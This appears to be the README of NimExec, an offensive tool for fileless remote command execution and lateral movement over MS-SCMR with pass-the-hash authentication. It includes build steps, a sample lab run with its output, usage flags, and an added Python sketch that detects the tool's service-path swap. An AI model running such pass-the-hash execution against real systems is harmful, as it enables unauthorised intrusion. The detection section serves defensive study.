Basically, NimExec is a fileless remote command execution tool that uses the Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service running as LocalSystem to the given command, starts the service so that the command executes on the target, and then restores the original binary path, all via hand-crafted RPC packets instead of WinAPI calls. Nothing is written to disk on the target; the packets are sent over SMB2 through the svcctl named pipe.
NimExec needs only the NTLM (NT) hash of the user to authenticate to the target machine; it completes the NTLM authentication exchange from that hash with hand-crafted packets (pass-the-hash), so the cleartext password is never required.
Since all required network packets are crafted manually and no operating-system-specific functions are used, NimExec can be built for and run from different operating systems using Nim's cross-compilation support.
This project was inspired by Julio's SharpNoPSExec tool. You can think of NimExec as a cross-compilable version of SharpNoPSExec with built-in pass-the-hash support. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec script.
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim
The above command uses a different garbage collector because Nim's default garbage collector throws SIGSEGV errors during the service enumeration step.
Also, you can install the required Nim modules via Nimble with the following command:
nimble install ptr_math nimcrypto hostname
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
[NimExec ASCII-art banner]
@R0h1rr1m
[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It has been tested against Windows 10 and 11 and Windows Server 2016, 2019 and 2022, from Ubuntu 20.04 and Windows 10 machines. The 1053 (ERROR_SERVICE_REQUEST_TIMEOUT) return value from StartServiceW shown above is expected rather than a failure: the service's binary path now points at cmd.exe, which runs the command but never reports back to the Service Control Manager the way a real service binary would, so the start request times out after the command has already executed.
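Seen from the target, the change-start-restore sequence in the output above leaves a short-lived footprint. The following detection sketch is an added example and not part of NimExec. It assumes that the Service Control Manager persists the new binary path to the service's ImagePath registry value (the write is performed by services.exe), that Sysmon is configured to log Event ID 13 (RegistryEvent: Value Set) for ImagePath, and that the client-side 1053 shows up on the target as System log events 7009 and 7000 for the same service. The event records and their field names are a constructed, simplified schema rather than output from a real SIEM.

```python
import re
from datetime import datetime, timedelta

# Added detection sketch, not NimExec's code. Flags a service whose ImagePath is
# rewritten and then rewritten again to a different value shortly afterwards,
# which is the change-run-restore pattern of NimExec / SharpNoPSExec-style
# tools. Schema and events below are constructed for the example.

IMAGEPATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Constructed sample events (not captured from a real host), already in time order.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:01", "source": "Sysmon", "id": 13,
     "image": r"C:\Windows\system32\services.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\LxpSvc\ImagePath",
     "details": r'cmd.exe /c "echo test > C:\Users\Public\test.txt"'},
    {"ts": "2024-05-01T10:00:31", "source": "System", "id": 7009, "service": "LxpSvc"},
    {"ts": "2024-05-01T10:00:31", "source": "System", "id": 7000, "service": "LxpSvc"},
    {"ts": "2024-05-01T10:00:32", "source": "Sysmon", "id": 13,
     "image": r"C:\Windows\system32\services.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\LxpSvc\ImagePath",
     "details": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    # Benign: an installer sets its own service's path once and leaves it.
    {"ts": "2024-05-01T11:15:00", "source": "Sysmon", "id": 13,
     "image": r"C:\Program Files\Foo\setup.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\FooUpdater\ImagePath",
     "details": r"C:\Program Files\Foo\updater.exe"},
    # Benign: the same service re-pointed a day later by an upgrade, outside the window.
    {"ts": "2024-05-02T11:15:00", "source": "Sysmon", "id": 13,
     "image": r"C:\Program Files\Foo\setup.exe",
     "target": r"HKLM\System\CurrentControlSet\Services\FooUpdater\ImagePath",
     "details": r"C:\Program Files\Foo\updater2.exe"},
]


def find_transient_imagepath_swaps(events, window_seconds=120):
    """Return one finding per ImagePath value that was replaced by a different
    value within window_seconds. SCM start errors (7009/7000) for the same
    service between the two writes are attached to strengthen the match."""
    writes = {}      # service name (lower-case) -> [(ts, new_value, writing_process)]
    scm_errors = {}  # service name (lower-case) -> [(ts, event_id)]
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["source"] == "Sysmon" and e["id"] == 13:
            m = IMAGEPATH_RE.search(e["target"])
            if m:
                writes.setdefault(m.group(1).lower(), []).append((ts, e["details"], e["image"]))
        elif e["source"] == "System" and e["id"] in (7000, 7009):
            scm_errors.setdefault(e["service"].lower(), []).append((ts, e["id"]))

    findings = []
    for svc, seq in writes.items():
        for (t1, v1, writer), (t2, v2, _) in zip(seq, seq[1:]):
            if v1 != v2 and t2 - t1 <= timedelta(seconds=window_seconds):
                errs = sorted({eid for t, eid in scm_errors.get(svc, []) if t1 <= t <= t2})
                findings.append({
                    "service": svc,
                    "transient_path": v1,        # what the SCM actually launched
                    "restored_path": v2,
                    "seconds_between": (t2 - t1).total_seconds(),
                    "writer": writer,            # services.exe when done over MS-SCMR
                    "scm_start_errors": errs,    # 7009/7000 mirror the client's 1053
                })
    return findings


if __name__ == "__main__":
    for finding in find_transient_imagepath_swaps(SAMPLE_EVENTS):
        print(finding)
```

Because the write comes from services.exe rather than from the attacker's process, filtering on the writing image alone does not help; the pairing of two writes in a short window, plus the start timeout for a service that was never meant to run cmd.exe, is what separates this from an ordinary service update.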
-v | --verbose Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service to use instead of a random one.
--help Show the help message.
Parameters marked with * are required.